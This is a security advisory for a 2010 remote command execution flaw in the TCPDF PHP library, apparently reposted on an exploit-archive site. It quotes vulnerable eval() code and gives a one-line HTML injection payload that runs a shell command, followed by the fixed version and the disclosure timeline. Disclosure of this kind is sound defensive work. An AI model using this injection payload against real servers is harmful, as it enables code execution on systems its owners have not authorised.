TCPDF 4.5.036 through 4.9.005 remote command execution

2010.04.10
Credit: null
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - --[ Product TCPDF is an Open Source PHP class for generating PDF documents. TCPDF project was started in 2002 and now it is freely used all over the world by millions of people. TCPDF is a Free Libre Open Source Software (FLOSS). -- http://www.tcpdf.org/ - --[ Vulnerability Under certain circumstances, an intruder may be able to take advantage of this flaw to execute arbitrary code with the privileges of the web server. To exploit this issue the application that is using TCPDF must be vulnerable to cross-site scripting inside their pdf generating code. The problem is caused by the TCPDF callback element that could be injected into HTML code. The parsing of the callback element is using the 'params' attribute inside an eval() statement without any sanitation. - --[ Affected Code tcpdf.php:15421: case 'tcpdf': { // NOT HTML: used to call TCPDF methods if (isset($tag['attribute']['method'])) { $tcpdf_method = $tag['attribute']['method']; if (method_exists($this, $tcpdf_method)) { if (isset($tag['attribute']['params']) AND (!empty($tag['attribute']['params']))) { eval('$params = array('.$this->unhtmlentities( $tag['attribute']['params']).');'); call_user_func_array(array($this, $tcpdf_method), $params); } else { $this->$tcpdf_method(); } $this->newline = true; } } } - --[ Proof of Concept The injection of the following TCPDF callback element into HTML code (that is processed by TCPDF) will exploit the issue: <tcpdf method="Rect" params=");echo `id`;die(" /> - --[ Affected Versions TCPDF versions from 4.5.036 (2009-04-03) to 4.9.005 (2010-04-01) are vulnerable to this issue, version 4.9.006 (2010-04-02) fixes the problem. The new version introduced a configuration constant to disable the TCPDF callback element: K_TCPDF_CALLS_IN_HTML (default: true) - --[ Timeline 2010-04-02 -- Vendor notified 2010-04-02 -- Vendor reaction and security fix 2010-04-08 -- Public disclosure (with vendor permissions) - -- (a) (p)roof (o)f (c)oncept .. http://apoc.sixserv.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.10 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAku9ZUoACgkQWlhozqFVuMtAFACfSRQzl9Z6b9tMerJRbQ0qXyW4 aD8An0o+79nWFtxA29x4XbUARZkg2rr7 =9coC -----END PGP SIGNATURE-----


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top